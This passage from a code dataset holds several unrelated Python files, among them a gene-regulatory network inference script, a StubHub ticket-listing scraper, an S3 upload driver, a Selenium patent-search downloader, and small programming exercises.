inferelator.regression.bbsr_multitask import BBSRByTaskRegressionWorkflow\n\nN_CORES = 100\nINPUT_DIR = '/mnt/ceph/users/cjackson/inferelator/data/yeast'\nOUTPUT_DIR = '/mnt/ceph/users/cjackson/inferelator/v031/'\nCONDA_ACTIVATE_PATH = '~/.local/anaconda3/bin/activate'\nYEASTRACT_PRIOR = \"YEASTRACT_20190713_BOTH.tsv\"\nTF_NAMES = \"tf_names_gold_standard.txt\"\nYEASTRACT_TF_NAMES = \"tf_names_yeastract.txt\"\n\n\ndef start_mpcontrol_dask(n_cores=N_CORES):\n utils.Debug.set_verbose_level(1)\n MPControl.set_multiprocess_engine(\"dask-cluster\")\n MPControl.client.minimum_cores = n_cores\n MPControl.client.maximum_cores = n_cores\n MPControl.client.walltime = '48:00:00'\n MPControl.client.add_worker_env_line('module load slurm')\n MPControl.client.add_worker_env_line('module load gcc/8.3.0')\n MPControl.client.add_worker_env_line('source ' + CONDA_ACTIVATE_PATH)\n MPControl.client.cluster_controller_options.append(\"-p ccb\")\n MPControl.connect()\n\n\nif __name__ == '__main__':\n start_mpcontrol_dask(100)\n\n for seed in range(42, 52):\n worker = workflow.inferelator_workflow(regression=BBSRByTaskRegressionWorkflow, workflow=\"amusr\")\n worker.set_file_paths(input_dir=INPUT_DIR, output_dir=OUTPUT_DIR, gold_standard_file=\"gold_standard.tsv\",\n gene_metadata_file=\"orfs.tsv\", priors_file=YEASTRACT_PRIOR,\n tf_names_file=YEASTRACT_TF_NAMES)\n worker.set_file_properties(gene_list_index=\"SystematicName\")\n worker.set_task_filters(target_expression_filter=\"union\", regulator_expression_filter=\"intersection\")\n worker.set_run_parameters(num_bootstraps=5, random_seed=seed)\n worker.set_crossvalidation_parameters(split_gold_standard_for_crossvalidation=True, cv_split_ratio=0.2)\n\n worker.append_to_path('output_dir', \"fig5d_mtl_bbsr_seed_\" + str(seed))\n\n # Jackson single cell task\n task = worker.create_task(task_name=\"Jackson_2019\",\n expression_matrix_file=\"103118_SS_Data.tsv.gz\",\n expression_matrix_columns_are_genes=True,\n extract_metadata_from_expression_matrix=True,\n expression_matrix_metadata=['Genotype', 'Genotype_Group', 'Replicate', 'Condition', 'tenXBarcode'],\n workflow_type=\"single-cell\",\n count_minimum=0.05,\n tasks_from_metadata=True,\n meta_data_task_column=\"Condition\")\n task.add_preprocess_step(single_cell.log2_data)\n\n worker.run()\n del worker\n","sub_path":"inferelator_0_3_1/singlecell_mtl_bbsr.py","file_name":"singlecell_mtl_bbsr.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628791508","text":"from blockchain import blockexplorer\r\n\r\n##############################\r\n\r\nclass BitcoinAddress:\r\n \"\"\"\r\n This is a class for Bitcoinaddresses with all relevant data stored\r\n \"\"\"\r\n def __init__(self, address, n_tx, total_received, total_sent, balance, last_tx_date, data_created_date, comment, transactions=None):\r\n \r\n self.address = address\r\n self.n_tx = n_tx\r\n self.total_received = total_received\r\n self.total_sent = total_sent\r\n self.balance = balance\r\n self.last_tx_date = last_tx_date\r\n self.data_created_date = 0\r\n self.comment = comment\r\n self.transactions = transactions\r\n \r\n def check_for_update(self, last_tx_time_old, address):\r\n api_address = blockexplorer.get_address(address)\r\n api_transactions = api_address.transactions\r\n last_tx_time = api_transactions[1].time\r\n if last_tx_time_old < last_tx_time:\r\n return True\r\n else:\r\n return False\r\n\r\n##############################\r\n\r\ndef build(address, comment=\"\"):\r\n # Builds the object with given attributes\r\n \r\n api_address = blockexplorer.get_address(address)\r\n api_transactions = api_address.transactions\r\n n_tx = api_address.n_tx\r\n total_received = api_address.total_received / 100000000\r\n total_sent = api_address.total_sent / 100000000\r\n balance = api_address.final_balance / 100000000\r\n if api_transactions:\r\n last_tx_date = api_transactions[0].time\r\n else:\r\n last_tx_date = 0\r\n #last_tx_date = datetime.utcfromtimestamp(api_transactions[-1].time).strftime('%Y-%m-%d %H:%M:%S')\r\n data_created_date = 0\r\n final_object = BitcoinAddress(address, n_tx, total_received, total_sent, balance, last_tx_date, data_created_date, comment, transactions=api_transactions)\r\n return final_object\r\n","sub_path":"Blockmole/app/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227278452","text":"import glob\nimport numpy as np\nimport cv2\nimport pdb\n\ncanvas = np.zeros((384, 384, 3))\n\nimg = np.zeros((9, 128, 128, 3))\n\nidx = 0\nfor sample in glob.glob('./*.png'):\n img[idx, :, :, :] = cv2.imread(sample)\n idx += 1\n\n#pdb.set_trace()\n\nidx = 0\nfor i in range (3):\n i = i * 128\n for j in range (3):\n j = j * 128\n #filename = './logs/dataset=wikiart,isCan=True,lr=0.0001,imsize=128,batch_size=35/003/samples/crop/{0}_{1}_{2}.png'.format(CAN_sample[-13:-4] ,i, j)\n #print (filename)\n #img = cv2.imread(sample)\n canvas[i:i+128, j: j+128,:] = img[idx, :, :, :]\n #cv2.imwrite(filename ,img[i:i+128, j: j+128,:]) \n idx += 1\n#print (np.shape(canvas))\n#pdb.set_trace()\ncv2.imwrite('collect.png' , canvas)\n","sub_path":"samples/wcan/make_9_9.py","file_name":"make_9_9.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"470082566","text":"# BOJ 11725\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN = int(input()) # of nodes\n# N = 7\np = {}\nQ = deque([1]) # default root\n\nMc = [list(map(int, input().split())) for _ in range(N-1)] # group of linked nodes\n# Mc = [[1, 6], [6, 3], [3, 5], [4, 1], [2, 4], [4, 7]]\nMct = [list(x) for x in zip(*Mc)]\nidx = 0\nGraph = {}\nfor _ in range(1,N+1):\n Graph[_] = []\n\nfor _ in range(N-1):\n x, y = Mc[_]\n Graph[x].append(y)\n Graph[y].append(x)\n\nwhile Q:\n pa_node = Q.popleft()\n for ch_node in Graph[pa_node]:\n p[ch_node] = pa_node\n tdx = Graph[ch_node].index(pa_node)\n Graph[ch_node].pop(tdx)\n Q.append(ch_node)\n\nfor _ in range(2, N+1):\n print(p[_])","sub_path":"TreeParent.py","file_name":"TreeParent.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335653424","text":"#!/software/anaconda3/2020.07/bin/python\n#SBATCH -A action -p action \n#SBATCH -o output.log\n#SBATCH --mem-per-cpu=12GB\n#SBATCH -t 10:00:00\n#SBATCH -n 1\n#SBATCH -N 1\nimport numpy as np\nfrom multiprocessing import Pool\nimport time , sys, os\nsys.path.append(os.popen(\"pwd\").read().replace(\"\\n\",\"\"))\nimport SM \nt0 = time.time()\nprint ()\n#---------------------------- SBATCH ---------------------------------------------------\nsbatch = [i for i in open('parallel.py',\"r\").readlines() if i[:10].find(\"#SBATCH\") != -1 ]\ncpu = int(sbatch[-2].split()[-1].replace(\"\\n\",\"\")) #int(os.environ['SLURM_JOB_CPUS_PER_NODE'])\nnodes = int(sbatch[-1].split()[-1].replace(\"\\n\",\"\"))\n\nprint (os.environ['SLURM_JOB_NODELIST'], os.environ['SLURM_JOB_CPUS_PER_NODE'])\nprint (f\"nodes : {nodes} | cpu : {cpu}\")\nprocs = cpu * nodes\n#----------------------------------\n#----------------------------------\ntry:\n print (sys.argv[1])\n print (sys.argv[2])\n print (sys.argv[3])\n R = np.linspace(float(sys.argv[1]),float(sys.argv[2]),int(sys.argv[3]))\nexcept:\n print (f\"Default Settings\")\n R = np.linspace(-4,4,24*8)\nwith Pool(1) as p:\n #------ Arguments for each CPU--------\n args = []\n for j in range(1):\n par = SM.param() \n args.append(par)\n #-------- parallelization --------------- \n result = p.map(SM.Hel, args)\n #----------------------------------------\nt2 = time.time() - t0 \nprint (f\"Time taken: {t2} s\")\nprint (f\"Time for each point: {t2/len(R)} s\")\n#------- Gather -----------------------------\nµ0, E0, _ = result[0]\nsh = len(µ0.flatten())\nµ = np.zeros( (sh+1 , len(R)) )\nE = np.zeros((len(E0)+1, len(R)) )\ndij = np.zeros((len(E0)**2+1, len(R)) )\nfor Ri in range(len(R)):\n µ[1:,Ri] = result[Ri][0].flatten()\n E[1:,Ri] = result[Ri][1].flatten()\n dij[1:,Ri] = result[Ri][2].flatten()\n # save R\n µ[0,Ri], E[0,Ri], dij[0,Ri] = R[Ri], R[Ri], R[Ri]\n \n#--------------------------------------------\nnp.savetxt(\"µ.txt\", µ.T)\nnp.savetxt(\"E.txt\", E.T)\nnp.savetxt(\"dij.txt\", dij.T)","sub_path":"double_well_01/Hm/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592708954","text":"import requests\nimport json\nimport re\nimport base64\nimport pandas as pd\nimport numpy as np\nfrom time import sleep\nimport datetime\n\nclass StubHub_Scrape(object):\n\n # Initialize class\n def __init__(self, sleep_time=6, test_mode = False,\n scrape_date = 'today',\n events_raw = None, inventory_raw = None):\n\n # Set the amount of time to sleep after each call\n self.__sleep_time = sleep_time\n\n # Store test mode indicator\n self.__test_mode = test_mode\n\n # Store date of initialization or user-entered date string\n self.scrape_date = datetime.datetime.now().strftime('%Y_%m_%d') if scrape_date == 'today'\\\n else scrape_date\n\n # Store the query headers... initialize as none\n self.__headers = None\n\n # Save the events dataframe... initialize as none\n self._events_raw = events_raw\n self.events = None\n\n # Save the listings dataframe... initialize as none\n self._inventory_raw = inventory_raw\n self.tickets = None\n\n # Set the list of cities we are searching for\n city_list = ['San Francisco', 'Oakland', 'Berkeley', 'San Jose',\n 'New York', 'Brooklyn', 'Bronx', 'Flushing', 'East Rutherford',\n 'Washington, DC', 'Vienna',\n 'Chicago', 'Rosemont', 'Evanston',\n 'Los Angeles', 'Hollywood', 'West Hollywood', 'Pasadena',\n 'Boston', 'Medford']\n self.__city_list = '\"' + '\" |\"'.join(city_list) + '\"'\n\n\n # Method to generate headers with authentication\n def _gen_auth_header_(self):\n\n # Get credentials from txt file\n with open('./passwords.txt') as passwords:\n text = passwords.readlines()\n\n app_token = re.search(\"'.*\", text[0]).group().replace(\"'\", \"\")\n consumer_key = re.search(\"'.*\", text[2]).group().replace(\"'\", \"\")\n consumer_secret = re.search(\"'.*\", text[3]).group().replace(\"'\", \"\")\n stubhub_username = re.search(\"'.*\", text[5]).group().replace(\"'\", \"\")\n stubhub_password = re.search(\"'.*\", text[6]).group().replace(\"'\", \"\")\n\n\n # Generate and encode token\n combo = consumer_key + ':' + consumer_secret\n basic_authorization_token = base64.b64encode(combo.encode('utf-8'))\n\n # Build request header\n headers = {\n 'Content-Type':'application/x-www-form-urlencoded',\n 'Authorization':'Basic '+basic_authorization_token.decode('utf-8')}\n\n # Build request body for authentication\n body = {\n 'grant_type':'password',\n 'username':stubhub_username,\n 'password':stubhub_password,\n 'scope': 'PRODUCTION'}\n\n # Make request for authentication\n url = 'https://api.stubhub.com/login'\n r = requests.post(url, headers=headers, data=body)\n print('authentication: {}'.format(r.status_code))\n\n # If authentication worked, parse the response object\n if r.status_code == 200:\n # Extract access token and user key\n token_respoonse = r.json()\n access_token = token_respoonse['access_token']\n user_GUID = r.headers['X-StubHub-User-GUID']\n\n # Otherwise, raise error\n else:\n print('authentication failed!')\n raise\n\n # Add auth token to headers\n headers['Authorization'] = 'Bearer ' + access_token\n headers['Accept'] = 'application/json'\n headers['Accept-Encoding'] = 'application/json'\n\n # Save header with auth\n self.__headers = headers\n\n # Take a rest!\n sleep(self.__sleep_time)\n\n\n # Method to check whether headers have been generated;\n ## generates headers if not\n def _verify_or_gen_auth_(self):\n if self.__headers == None:\n self._gen_auth_header_()\n else:\n pass\n\n\n # Method to get raw events list in dict form\n def _get_events_raw(self):\n self._verify_or_gen_auth_()\n\n # Define events url and query params\n events_url = 'https://api.stubhub.com/search/catalog/events/v3'\n params = {'city': self.__city_list, 'q': 'concert', 'sort': 'id',\n 'start': 0, 'rows': 500, 'fieldList': '*,ticketInfo'}\n\n # Run the first request; get the total number of events\n events_r = requests.get(events_url, headers = self.__headers, params = params).json()\n n_found = events_r['numFound']\n print('Got first page of events. Found {} total events.'.format(n_found))\n\n # Start collecting the event response objects; mark with the datetime collected\n events = events_r['events']\n list(map(lambda i: i.update({'dt_accessed': str(datetime.datetime.now())}), events))\n\n\n # Take a rest! Then, get ready for the next request\n sleep(self.__sleep_time)\n params['start'] += 500\n\n # Run a loop through search results and collect\n while params['start'] < n_found:\n\n # Get results, mark with dt, and store\n events_r = requests.get(events_url, headers = self.__headers, params = params).json()['events']\n list(map(lambda i: i.update({'dt_accessed': str(datetime.datetime.now())}), events_r))\n events.extend(events_r)\n print('Got events {} through {}'.format(params['start'], params['start'] + 500))\n\n # Increment through pages; sleep before moving on\n params['start'] += 500\n sleep(self.__sleep_time)\n\n # Escape the while loop after two calls if in test mode\n if self.__test_mode and params['start']>1000:\n print('No more events gathering... test mode!')\n break\n\n print('Got events!')\n\n # Save raw events object\n self._events_raw = events\n\n\n\n def _parse_events(self):\n\n print('Parsing events.')\n\n # Turn events list into a dataframe and remove duplicate events\n events_df = pd.DataFrame(self._events_raw)\n events_df = events_df.drop_duplicates(subset='id')\n\n # Remove parking passes\n parking_passes = events_df.name.apply(lambda n:\n re.search('parking passes only', n.lower()) != None)\n events_df = events_df[~parking_passes]\n\n # Extract event category\n events_df['category'] = events_df.categoriesCollection.apply(lambda x: x[0]['name'])\n\n # Boolean for event parking\n events_df['event_parking'] = events_df.eventAttributes.notna()\n\n # Event geo -- get the most detailed category\n events_df['geos'] = events_df.geos.apply(lambda x: x[-1]['name'])\n\n # Generate event performers dataframe\n events_df['performersCollection'] = events_df.performersCollection.fillna('none')\n events_df.apply(lambda event: None if event['performersCollection'] == 'none'\n else\n [perf.update({'event_id': event['id'],\n 'dt_accessed': event['dt_accessed']})\n for perf in event['performersCollection']], axis=1)\n events_perf = pd.DataFrame(\n events_df.loc[events_df['performersCollection'] != 'none', 'performersCollection'].\n apply(pd.Series).stack().tolist())\n events_perf = events_perf.rename(index=str, columns={'id': 'performer_id', 'name': 'performer_name'})\n events_perf = events_perf.drop(['seoURI', 'webURI'], axis=1, errors='ignore')\n\n # Generate event score dataframe\n events_scores = events_df.loc[:, ['id', 'score', 'dt_accessed']]\n events_scores['date'] = self.scrape_date\n events_scores = events_scores.rename(index=str, columns={'id': 'event_id'})\n\n # Generate event ticket summary dataframe\n ## Add the event id and dt accessed to the dictionary\n events_df['ticketInfo'] = events_df.ticketInfo.fillna('none')\n events_df.apply(lambda event: None if event['ticketInfo'] == 'none'\n else event['ticketInfo'].update(\n {'event_id': event['id'],\n 'dt_accessed': event['dt_accessed']})\n , axis=1)\n events_ticket_summary = events_df[events_df.ticketInfo.notnull()].\\\n ticketInfo.apply(pd.Series)\n # Remove unnecessary dictionary-like fields from dataframe\n events_ticket_summary = events_ticket_summary.loc[:, events_ticket_summary.columns.str.find('With') == -1]\n # Add date\n events_ticket_summary['date'] = self.scrape_date\n\n # Generate venues DataFrame\n events_df.apply(lambda x: x['venue'].update({'dt_accessed': x['dt_accessed']}), axis=1)\n venues = events_df.venue.apply(pd.Series)\n venues = venues.drop_duplicates(subset = 'id')\n venues = venues.rename(index=str, columns={'id': 'venue_id'})\n venues = venues.drop(['webURI', 'seoURI', 'venueUrl', 'venueConfigId'],\n axis=1, errors='ignore')\n\n # Label events dataframe with venue id\n events_df['venue_id'] = events_df.venue.apply(lambda i: i['id'])\n\n # Get name of venue configuration\n events_df['venue_config'] = events_df.venueConfiguration.apply(lambda x: x['name'])\n\n # Tag events df with date\n events_df['date'] = self.scrape_date\n\n # Drop unwanted columns\n events_df = events_df.drop(['ancestors', 'associatedEvents', 'attributes', 'bobId',\n 'catalogTemplate', 'categories', 'categoriesCollection', 'defaultLocale',\n 'displayAttributes','eventAttributes', 'groupings',\n 'groupingsCollection', 'imageUrl', 'images', 'locale',\n 'mobileAttributes', 'performers', 'performersCollection', 'score',\n 'seoURI', 'webURI',\n 'sourceId', 'status', 'ticketInfo','venue', 'venueConfiguration'],\n axis = 1, errors = 'ignore')\n\n events_df = events_df.rename(index=str, columns={'id': 'event_id'})\n\n # Save events dataframes\n self.events = {'events_df': events_df, 'events_perf': events_perf,\n 'events_scores': events_scores,\n 'events_ticket_summary': events_ticket_summary,\n 'venues_df': venues}\n\n print('Events parsed!')\n\n # End-to-end wrapper to generate a list of events\n def get_events(self):\n\n if not self._events_raw:\n self._get_events_raw()\n\n self._parse_events()\n\n print('We have events!')\n\n\n\n\n # Method to gather ticket inventory (json objects)\n def _get_inventory(self):\n self._verify_or_gen_auth_()\n\n # Get events if we have not yet\n if not self.events:\n self.get_events()\n\n print('Getting inventory.')\n\n # Get a list of event IDs that have available tickets\n events_l = self.events['events_ticket_summary']\n events_l = events_l.loc[events_l['totalListings']>0, ['event_id', 'totalListings']]\n events_l = events_l.reset_index(drop=True)\n print(events_l.head())\n\n # Save inventory URL\n inventory_url = 'https://api.stubhub.com/search/inventory/v2'\n\n # Initialize empty inventory list\n inventory = []\n\n # Only keep first n listings if we're in test mode\n if self.__test_mode:\n n = 3 # First n listings for testing\n events_l = events_l.iloc[0:n, :]\n\n # Loop through each event and get ticket listings\n for i, id, n_tickets in events_l.itertuples():\n\n print('Getting ticket inventory event {} out of {}'.format(i + 1, len(events_l)))\n\n # Initialize parameters and blank inventory list\n params = {'eventid': id, 'start': 0, 'rows': 250,\n 'fieldsList': '*,faceValue,listingAttributeList'}\n\n # Continue looping until we've gotten all of the listings\n while params['start'] <= n_tickets:\n\n # Use a try statement because sometimes the last listing\n # might be sold before we make the inventory query\n try:\n\n # Query for tickets\n inventory_r = requests.get(inventory_url, headers=self.__headers,\n params=params).json()['listing']\n\n # Add the event id to each ticket\n list(map(lambda i: i.update({'event_id': id,\n 'dt_accessed': str(datetime.datetime.now())}),\n inventory_r))\n\n # Add responses to the inventory list\n inventory.extend(inventory_r)\n\n except:\n pass\n\n # Increase the starting point for next search\n params['start'] += 100\n\n # Take a rest!\n sleep(self.__sleep_time)\n\n # Save inventory to raw listings object\n self._inventory_raw = inventory\n\n\n\n # Method to parse existing ticket inventory\n def _parse_inventory(self):\n\n # Make a dataframe out of listings; drop duplicates\n tickets_df = pd.DataFrame(self._inventory_raw)\n tickets_df = tickets_df.drop_duplicates(subset='listingId')\n\n # Convert price dictionaries into columns\n tickets_df['price_curr'] = tickets_df.currentPrice.apply(lambda x: x['amount'])\n tickets_df['currency_curr'] = tickets_df.currentPrice.apply(lambda x: x['currency'])\n tickets_df['price_list'] = tickets_df.listingPrice.apply(lambda x: x['amount'])\n tickets_df['currency_list'] = tickets_df.listingPrice.apply(lambda x: x['currency'])\n\n # Generate delivery type df\n tickets_deliv_type = tickets_df.set_index('listingId')['deliveryTypeList'].\\\n apply(pd.Series).stack().reset_index()\n tickets_deliv_type = tickets_deliv_type.drop('level_1', axis=1)\n tickets_deliv_type = tickets_deliv_type.rename(index=str, columns={0: \"listings_deliv_type\"})\n tickets_deliv_type = tickets_deliv_type.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n tickets_deliv_type['date'] = self.scrape_date\n\n\n # Generate delivery method df\n tickets_deliv_method = tickets_df.set_index('listingId')['deliveryMethodList'].\\\n apply(pd.Series).stack().reset_index()\n tickets_deliv_method = tickets_deliv_method.drop('level_1', axis=1)\n tickets_deliv_method = tickets_deliv_method.rename(index=str, columns={0: \"listings_deliv_method\"})\n tickets_deliv_method = tickets_deliv_method.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n tickets_deliv_method['date'] = self.scrape_date\n\n\n # Get face value from dict\n ## Use try except because sometimes we don't get face value\n try:\n tickets_df['faceValue'] = tickets_df.faceValue.apply(lambda x: np.NaN if pd.isnull(x)\n else x['amount'])\n except:\n tickets_df['faceValue'] = np.NaN\n\n # Generate listing attribute df\n ## Use a try statement because sometimes we don't get the listing attr list back from the API\n try:\n tickets_listing_attr = tickets_df.set_index('listingId')['listingAttributeList'].\\\n apply(pd.Series).stack().reset_index()\n tickets_listing_attr = tickets_listing_attr.drop('level_1', axis=1)\n tickets_listing_attr = tickets_listing_attr.rename(index=str, columns={0: \"listings_listing_attr\"})\n except:\n tickets_listing_attr = 'none'\n\n # Get ticket price from dict\n tickets_df['listingPrice'] = tickets_df.listingPrice.apply(lambda x: x['amount'])\n\n # Generate ticket splits df\n tickets_splits_df = tickets_df.set_index('listingId')['splitVector'].\\\n apply(pd.Series).stack().reset_index()\n tickets_splits_df = tickets_splits_df.drop('level_1', axis=1)\n tickets_splits_df = tickets_splits_df.rename(index=str, columns={0: \"tickets_splits_option\"})\n tickets_splits_df['date'] = self.scrape_date\n tickets_splits_df = tickets_splits_df.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n\n # Add date\n tickets_df['date'] = self.scrape_date\n\n # Drop unwanted columns\n tickets_df = tickets_df.drop(['businessGuid', 'currentPrice', 'deliveryMethodList',\n 'deliveryTypeList', 'listingAttributeList', 'listingAttributeCategoryList',\n 'sellerOwnInd', 'splitVector'],\n axis = 1, errors = 'ignore')\n\n # Save ticket dataframes\n self.tickets = {'tickets_df': tickets_df,\n 'tickets_deliv_type': tickets_deliv_type,\n 'tickets_deliv_method': tickets_deliv_method,\n 'tickets_listing_attr': tickets_listing_attr,\n 'tickets_splits': tickets_splits_df}\n\n\n\n # Wrapper for end-to-end ticket gathering\n def get_tickets(self):\n\n # Get ticket inventory if we have not yet\n if not self._inventory_raw:\n self._get_inventory()\n\n # Parse inventory\n self._parse_inventory()\n\n print('Success!')\n","sub_path":"StubHub/stubhub_scraper.py","file_name":"stubhub_scraper.py","file_ext":"py","file_size_in_byte":17767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"547156950","text":"n = int(input())\r\n\r\nparking = set()\r\nfor _ in range(n):\r\n direction, reg_num = input().split(', ')\r\n if direction == 'IN':\r\n parking.add(reg_num)\r\n elif direction == 'OUT':\r\n parking.remove(reg_num)\r\nif parking:\r\n print('\\n'.join(parking))\r\nelse:\r\n print('Parking Lot is Empty')","sub_path":"Python Advanced 2021/TUPLES AND SETS/Lab 04 - ver 2.py","file_name":"Lab 04 - ver 2.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"31600274","text":"\nfrom masonite.contracts.UploadContract import UploadContract\nfrom masonite.drivers.BaseUploadDriver import BaseUploadDriver\nfrom masonite.exceptions import DriverLibraryNotFound\n\n\nclass UploadS3Driver(BaseUploadDriver, UploadContract):\n \"\"\"\n Amazon S3 Upload driver\n \"\"\"\n\n def __init__(self, UploadManager, StorageConfig):\n self.upload = UploadManager\n self.config = StorageConfig\n\n def store(self, fileitem, location=None):\n driver = self.upload.driver('disk')\n driver.store(fileitem, location)\n file_location = driver.file_location\n\n # Check if is a valid extension\n self.validate_extension(fileitem.filename)\n\n try:\n import boto3\n except ImportError:\n raise DriverLibraryNotFound(\n 'Could not find the \"boto3\" library. Please pip install this library by running \"pip install boto3\"')\n\n session = boto3.Session(\n aws_access_key_id=self.config.DRIVERS['s3']['client'],\n aws_secret_access_key=self.config.DRIVERS['s3']['secret'],\n )\n\n s3 = session.resource('s3')\n\n s3.meta.client.upload_file(\n file_location,\n self.config.DRIVERS['s3']['bucket'],\n fileitem.filename\n )\n\n return fileitem.filename\n\n def store_prepend(self, fileitem, prepend, location=None):\n fileitem.filename = prepend + fileitem.filename\n\n return self.store(fileitem, location=location)\n","sub_path":"python/egghead.io/Quick Lessons/venv/lib/python3.6/site-packages/masonite/drivers/UploadS3Driver.py","file_name":"UploadS3Driver.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492786153","text":"from time import sleep\nfrom selenium import webdriver\n\ndownload_path = './'\n\n# 크롤러 세팅\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\n\n# 헤드리스에서 다운로드를 위한 옵션\nchrome_options.add_experimental_option(\"prefs\", {\n \"download.default_directory\": download_path,\n 'download.prompt_for_download':False,\n 'download.directory_upgrade':True,\n 'safebrowsing.enabled':False,\n 'safebrowsing.disable_download_protection':True\n})\n\n#driver = webdriver.Chrome(executable_path='./chromedriver',chrome_options=chrome_options)\ndriver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver',chrome_options=chrome_options)\ndriver.implicitly_wait(3)\nurl ='http://kpat.kipris.or.kr/kpat/searchLogina.do?next=MainSearch#page1'\ndriver.get(url)\n\n# 헤드리스에서 다운로드 시 실행되지 않는 부분을 실행하는 함수\ndriver.command_executor._commands[\"send_command\"] = (\"POST\",'/session/$sessionId/chromium/send_command')\nparams = {'cmd':'Page.setDownloadBehavior','params': {'behavior': 'allow','downloadPath': download_path}}\ncommand_result = driver.execute(\"send_command\",params)\n\nsearch = driver.find_element_by_xpath('//input[@title=\"검색어입력\"]')\nsearch.send_keys(\"롯데정보통신\")\ndriver.find_element_by_xpath('//*[@id=\"SearchPara\"]/fieldset/span[1]').click()\nsleep(5)\n\n# 클릭이 안먹히는 놈은 밑에와 같이 수행해야 한다.\ndownloadBtn = driver.find_element_by_xpath(\"//span[@class='icon_exl']//a\")\ndriver.execute_script(\"arguments[0].click();\",downloadBtn)\nsleep(3)\ndriver.close() \n\n","sub_path":"source/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"239608245","text":"from ClientPlayer import ClientPlayer\nfrom Server import Server\nfrom multiprocessing import Process\nfrom tkinter import messagebox, simpledialog\nimport tkinter\nimport sys\n\nif __name__ == \"__main__\":\n NUM_PORT = 8003\n ip = '192.168.43.208'\n nb_player = 0\n\n root = tkinter.Tk() # initialisation d'une interface pour les choix\n windowWidth = root.winfo_reqwidth() # Centrage de cette interface sur l'écran\n windowHeight = root.winfo_reqheight()\n positionRight = int(root.winfo_screenwidth() / 2 - windowWidth / 2)\n positionDown = int(root.winfo_screenheight() / 2 - windowHeight / 2)\n root.geometry(\"+{}+{}\".format(positionRight, positionDown))\n root.withdraw() # On enlève la fenêtre \"fantome\" derrière les popups\n\n is_server = messagebox.askyesno(\"Freak out !\", \"Voulez-vous être le serveur de jeu ?\")\n if is_server:\n ip = simpledialog.askstring(\"Freak out !\", \"Quelle est votre IP à utiliser ?\", initialvalue=ip)\n while nb_player < 1 or nb_player > 3:\n nb_player = simpledialog.askinteger(\"Freak out !\", \"Combien de joueurs ? (entre 1 et 3)\", initialvalue=1)\n nickname = simpledialog.askstring(\"Freak out !\", \"Quel est votre pseudo ?\", initialvalue='Toto')\n server_process = Process(target=Server, args=(nb_player, ip, NUM_PORT)) # Lancement process server\n client_process = Process(target=ClientPlayer, args=(nickname, ip, NUM_PORT)) # Lancement d'un process client\n server_process.start() # Lancement des process\n client_process.start()\n client_process.join() #Attente de la fin des process\n server_process.join()\n else:\n ip = simpledialog.askstring(\"Freak out !\", \"A quelle adresse IP se connecter ?\", initialvalue=ip)\n nickname = simpledialog.askstring(\"Freak out !\", \"Quel est votre pseudo ?\")\n client_process = Process(target=ClientPlayer, args=(nickname, ip, NUM_PORT))\n client_process.start()\n client_process.join()\n print(\"Arrêt du programme principal.\")\n sys.exit()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"137327282","text":"class Solution(object):\n def minArea(self, image, x, y):\n \"\"\"\n :type image: List[List[str]]\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n image[x][y] = '2';\n xRange = [x, x];\n yRange = [y, y];\n start = [[x, y]];\n \n \n \n # fill def\n def fill(image, xRange, yRange, start):\n st = [];\n for s in start:\n if s[0] > 0 and image[s[0]-1][s[1]] == '1':\n image[s[0]-1][s[1]] = '2';\n st += [[s[0]-1, s[1]]];\n xRange[0] = min(xRange[0], s[0]-1);\n \n if s[0] < len(image)-1 and image[s[0]+1][s[1]] == '1':\n image[s[0]+1][s[1]] = '2';\n st += [[s[0]+1, s[1]]];\n xRange[1] = max(xRange[1], s[0]+1);\n \n if s[1] > 0 and image[s[0]][s[1]-1] == '1':\n image[s[0]][s[1]-1] = '2';\n st += [[s[0], s[1]-1]];\n yRange[0] = min(yRange[0], s[1]-1);\n \n if s[1] < len(image[0])-1 and image[s[0]][s[1]+1] == '1':\n image[s[0]][s[1]+1] = '2';\n st += [[s[0], s[1]+1]];\n yRange[1] = max(yRange[1], s[1]+1);\n \n if len(st): fill(image, xRange, yRange, st);\n \n fill(image, xRange, yRange, start);\n return (xRange[1]-xRange[0]+1) * (yRange[1]-yRange[0]+1);\n # pass at 1:!2","sub_path":"301-400/301-310/py/302_smallest_rectangle.py","file_name":"302_smallest_rectangle.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"487803533","text":"import random\nimport math \n\n'''A = []\nB = []\nM = int(input(\"Enter number of elements: \"))\nfor i in range(M):\n A.append(random.randrange(-10, 10, 1))\nprint(A)\n\n\nfor i in range(M):\n B.append(A[i])\n if A[i] < 0:\n A[i] = pow(A[i], 2)\n B.append(A[i])\nA = B\nprint(A)'''\n\nA = []\nM = int(input(\"Enter number of elements: 